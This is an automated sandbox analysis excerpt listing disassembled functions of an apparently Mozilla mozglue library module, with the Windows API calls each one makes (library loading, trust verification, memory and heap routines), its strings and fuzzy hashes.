LoadLibraryW.KERNEL32(wintrust.dll,?,665E7235), ref: 666100D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 666100F7
FreeLibrary.KERNEL32(?,665E7235), ref: 6661010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 666100F1
wintrust.dll, xrefs: 666100D3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 88e309b0d087389d5d78ec4dddf5b255aba41ea2148c579e1619037efbab8927
Instruction ID: 5c92a730ad5030caa11aabcf88e98664ec7c3da73b55ae932271990c7c01a6ed
Opcode Fuzzy Hash: 88e309b0d087389d5d78ec4dddf5b255aba41ea2148c579e1619037efbab8927
Instruction Fuzzy Hash: 44E0E570408325AAEF00DF6BFA1B722BAFBA7C6244F144055AB09C1200DFB48060CA52

Function 66610080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E7204), ref: 66610088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 666100A7
FreeLibrary.KERNEL32(?,665E7204), ref: 666100BE

Strings

CryptCATAdminAcquireContext2, xrefs: 666100A1
wintrust.dll, xrefs: 66610083

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 842aba646a76a9d402d2f793c02e4fdfe7a79cd93e4e85bcfae65c9449c1dc66
Instruction ID: 84b77d8fcec3ecd3110ded4999ff7a176257596aa19ebfa386d81c74821db228
Opcode Fuzzy Hash: 842aba646a76a9d402d2f793c02e4fdfe7a79cd93e4e85bcfae65c9449c1dc66
Instruction Fuzzy Hash: 30E01A74504321ABEF00EF2BF80A701BAFBA7CB381F008056AB10C2210DBB5C020CF92

Function 66610170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E7308), ref: 66610178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 66610197
FreeLibrary.KERNEL32(?,665E7308), ref: 666101AE

Strings

wintrust.dll, xrefs: 66610173
CryptCATCatalogInfoFromContext, xrefs: 66610191

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 0bbf0f1811a48b66441ad2b7c2cb8a3c4647662f7dc280c1ca453e2e467a927d
Instruction ID: 762b29a4b6efe1f5e9f4725b2035ea5ead28e38c3dda2b62840dd8be5fa77ddb
Opcode Fuzzy Hash: 0bbf0f1811a48b66441ad2b7c2cb8a3c4647662f7dc280c1ca453e2e467a927d
Instruction Fuzzy Hash: 65E0E570484261AAEF009F6BF91BB02BBFBB7C6285F140196EB8085350DBB48064CE52

Function 66610120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E7297), ref: 66610128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 66610147
FreeLibrary.KERNEL32(?,665E7297), ref: 6661015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 66610141
wintrust.dll, xrefs: 66610123

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: cb40d76562512a6d05577cd039d15b58f52537e84d0c4b0ca5f44039f6a1b9db
Instruction ID: 0e65b81ba7fa60823bef5232b88bfb1331abe0bc9a498ccf0c94b87d47ee946f
Opcode Fuzzy Hash: cb40d76562512a6d05577cd039d15b58f52537e84d0c4b0ca5f44039f6a1b9db
Instruction Fuzzy Hash: F0E0E574408265ABEF00AF6BF81B702BAFBA7C7354F044555AB04D2240DBB4C020CF96

Function 666101C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E7266), ref: 666101C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 666101E7
FreeLibrary.KERNEL32(?,665E7266), ref: 666101FE

Strings

CryptCATAdminReleaseContext, xrefs: 666101E1
wintrust.dll, xrefs: 666101C3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 42a308836eca23eb20d81e6a68bcf76d47d0522d7a1cf8048ae636fb467cedd3
Instruction ID: a3e2c307115cbdf843acc4a7706289be7bd8f580b4224e87ebec78c15a639f0c
Opcode Fuzzy Hash: 42a308836eca23eb20d81e6a68bcf76d47d0522d7a1cf8048ae636fb467cedd3
Instruction Fuzzy Hash: 6BE07D744443A5ABEF01EF6BF41A7017AFBA7C7385F0044569B05D1250DB74C024DF51

Function 66637600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,66637592), ref: 66637608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 66637627
FreeLibrary.KERNEL32(?,66637592), ref: 6663763C

Strings

NtUnmapViewOfSection, xrefs: 66637621
ntdll.dll, xrefs: 66637603

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: fd5d6f5856c3c1868280a399048617732dc87634bacf6a551ce129ffceaa1400
Instruction ID: 1d17e383011437a94c039f0443e91a2f73661740fba75a914cbf60ff64d4d356
Opcode Fuzzy Hash: fd5d6f5856c3c1868280a399048617732dc87634bacf6a551ce129ffceaa1400
Instruction Fuzzy Hash: 31E07EB0400361ABDF01EF67FC2A7017EABE7DA299F005055EB05E2250EBB1A4108F58

Function 6663C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6663C0E9), ref: 6663C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6663C437
FreeLibrary.KERNEL32(?,6663C0E9), ref: 6663C44C

Strings

NtQueryVirtualMemory, xrefs: 6663C431
ntdll.dll, xrefs: 6663C413

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 55084e4c9fe711adb2fcbd6ede6d70837695c393a1fa281656cde0b682c37849
Instruction ID: c6840cd5b1855874f0bc364c53ec1bea0362fc3f921b051db4756e323b129f19
Opcode Fuzzy Hash: 55084e4c9fe711adb2fcbd6ede6d70837695c393a1fa281656cde0b682c37849
Instruction Fuzzy Hash: 0EE09270602361ABDF01EF73F91AB157AFBA7C6245F049156AB05A2311EBB2D0148E56

Function 666375B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6663748B,?), ref: 666375B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 666375D7
FreeLibrary.KERNEL32(?,6663748B,?), ref: 666375EC

Strings

RtlNtStatusToDosError, xrefs: 666375D1
ntdll.dll, xrefs: 666375B3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 2aa4da4df2a9eb239eebfa5901b783af81457ba616edb75a1d486e86ff6f4a50
Instruction ID: 460528bd30056ffe7e7481f8a6c0622a98068a047d0774ae4ec4347698792194
Opcode Fuzzy Hash: 2aa4da4df2a9eb239eebfa5901b783af81457ba616edb75a1d486e86ff6f4a50
Instruction Fuzzy Hash: B8E09271400361ABEB01EF63F85A7027EEBEBC6259F205065AB05E1290EBB0E051CF54

Function 6663C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E77F6), ref: 6663C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6663C267
FreeLibrary.KERNEL32(?,665E77F6), ref: 6663C27C

Strings

CryptCATAdminAcquireContext, xrefs: 6663C261
wintrust.dll, xrefs: 6663C243

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 30639ec288a52bc419cd7103272a3d62fd7619f294e65a211ad584134ded2449
Instruction ID: 50cc1481254f59de97790a355ed9bfaafa3691dd66c781a4e15b2a6074db22df
Opcode Fuzzy Hash: 30639ec288a52bc419cd7103272a3d62fd7619f294e65a211ad584134ded2449
Instruction Fuzzy Hash: FEE09274400321ABDF05EF63F95AB027AFBA7CB345F105855EB05E2210E7B080509F56

Function 6663BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,665E05BC), ref: 6663BAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6663BAD7
FreeLibrary.KERNEL32(?,665E05BC), ref: 6663BAEC

Strings

kernelbase.dll, xrefs: 6663BAB3
VirtualAlloc2, xrefs: 6663BAD1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: ef1554eea48b9797c1453b78f33b4e16f2e9ed9619ff08c76547290d880123c8
Instruction ID: 2afa258d9160901e88d746bdc0e2546384fdd3fa4120b5b0ec70bce584c2ea0c
Opcode Fuzzy Hash: ef1554eea48b9797c1453b78f33b4e16f2e9ed9619ff08c76547290d880123c8
Instruction Fuzzy Hash: 4EE092704007A2BBDB01DF63F92BB067BFBE7C6345F14005AAB06A1310EBB480148F16

Function 6663C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,665E77C5), ref: 6663C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6663C2B7
FreeLibrary.KERNEL32(?,665E77C5), ref: 6663C2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6663C2B1
wintrust.dll, xrefs: 6663C293

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: c38494e8cfaf2c45d54b72cbaddd8ed87d2bbe924699641ad0146062a46d138f
Instruction ID: 231959445f72238a402eb208b1fe267dbcf130a8468e693a78455831b29ed2b8
Opcode Fuzzy Hash: c38494e8cfaf2c45d54b72cbaddd8ed87d2bbe924699641ad0146062a46d138f
Instruction Fuzzy Hash: 3AE01270400361AFDF00EF6BF91A7027BFBEBC22A0F480055AB45A2290E7B08010CE02

Function 6663C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6663C1DE,?,00000000,?,00000000,?,665E779F), ref: 6663C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6663C217
FreeLibrary.KERNEL32(?,6663C1DE,?,00000000,?,00000000,?,665E779F), ref: 6663C22C

Strings

WinVerifyTrust, xrefs: 6663C211
wintrust.dll, xrefs: 6663C1F3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 9e3575c71b5f3c6ce21e1972566ef06edf50b0df6e57d8e79e84f8236f37ebeb
Instruction ID: 7295407aa6dad39cdd6c937bbaac2211ac7e40520253d97e1fc6c5d1c6705db4
Opcode Fuzzy Hash: 9e3575c71b5f3c6ce21e1972566ef06edf50b0df6e57d8e79e84f8236f37ebeb
Instruction Fuzzy Hash: 77E092745003A1ABDB01EF63F91A7027EFBABC6245F441156AB05E2211E7B080108F56

Function 6663BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6663BE49), ref: 6663BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6663BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6663BE49), ref: 6663BF38
RtlReAllocateHeap.NTDLL ref: 6663BF83
RtlFreeHeap.NTDLL(6663BE49,00000000), ref: 6663BFA6

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 05072ddef2cbda11baf93312920ebff16267368f1c4ff698bd0f9511cea046d1
Instruction ID: c97ac24a92fb9d1fc03beb001bcae078f0e496206b0671169202ef55472f616a
Opcode Fuzzy Hash: 05072ddef2cbda11baf93312920ebff16267368f1c4ff698bd0f9511cea046d1
Instruction Fuzzy Hash: B3518E75A006258FE710CF68DD81BAAB7A2FFD8310F29A62DD516A7754D730F906CB80

Function 66628E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?,6664D734), ref: 66628E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?,6664D734), ref: 66628EBF
free.MOZGLUE(?,?,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?), ref: 66628F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?,6664D734), ref: 66628F46
free.MOZGLUE(?,?,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?), ref: 66628F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6661B58D,?,?,?,?,?,?,?,6664D734,?,?,?), ref: 66628F8F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 5abc04854e03b718d893c909f9cb59dda5ae01d608562f4590c112b924c700cd
Instruction ID: 5399817df54633bb5c5907906b6712feda3409749aaa5208f8e28da81ed45e4c
Opcode Fuzzy Hash: 5abc04854e03b718d893c909f9cb59dda5ae01d608562f4590c112b924c700cd
Instruction Fuzzy Hash: 0C518EB1A002169FEB14CF64EC816AF77BABB84354F15046DDA16AB350E731F909CF92

Function 665E60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E6180
free.MOZGLUE(?,?,?,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 665E6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E6229
free.MOZGLUE(?,?,?,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 665E625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,665E5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 665E6271

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 473c63361dee8cab90ccb2294b8d621c6a1c13a0967804c9aa652a03c8de39e4
Instruction ID: 92ea35ebcedc48aee79c23c380e338062d1a77deae09ac032dfce8d96420aba6
Opcode Fuzzy Hash: 473c63361dee8cab90ccb2294b8d621c6a1c13a0967804c9aa652a03c8de39e4
Instruction Fuzzy Hash: B9516AB1A003068FEF14CFA9DC8276EB7B6EF55388F104439C61697351E731AA55CB91

Function 666227E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 6662284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 6662289A
free.MOZGLUE(?,?,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 666228F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 66622910
free.MOZGLUE(00000001,?,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 6662293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,66622620,?,?,?,666160AA,66615FCB,666179A3), ref: 6662294E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 1e82239089c47f0afd72f1f787b5046a04c20c77060b7f09ac471701901e5204
Instruction ID: d822e55eabecda1e0a82d1adc8d58b91c24af8fef6d23f8a2972a87a67b60411
Opcode Fuzzy Hash: 1e82239089c47f0afd72f1f787b5046a04c20c77060b7f09ac471701901e5204
Instruction Fuzzy Hash: BD41BDB1E102168FEB14CF69E88076A77EEAB85304F140939DA56EB340E731E914CFA1

Function 665DCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E784), ref: 665DCFF6
LeaveCriticalSection.KERNEL32(6665E784), ref: 665DD026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 665DD06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 665DD139

Strings

MOZ_CRASH(), xrefs: 665DD187

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
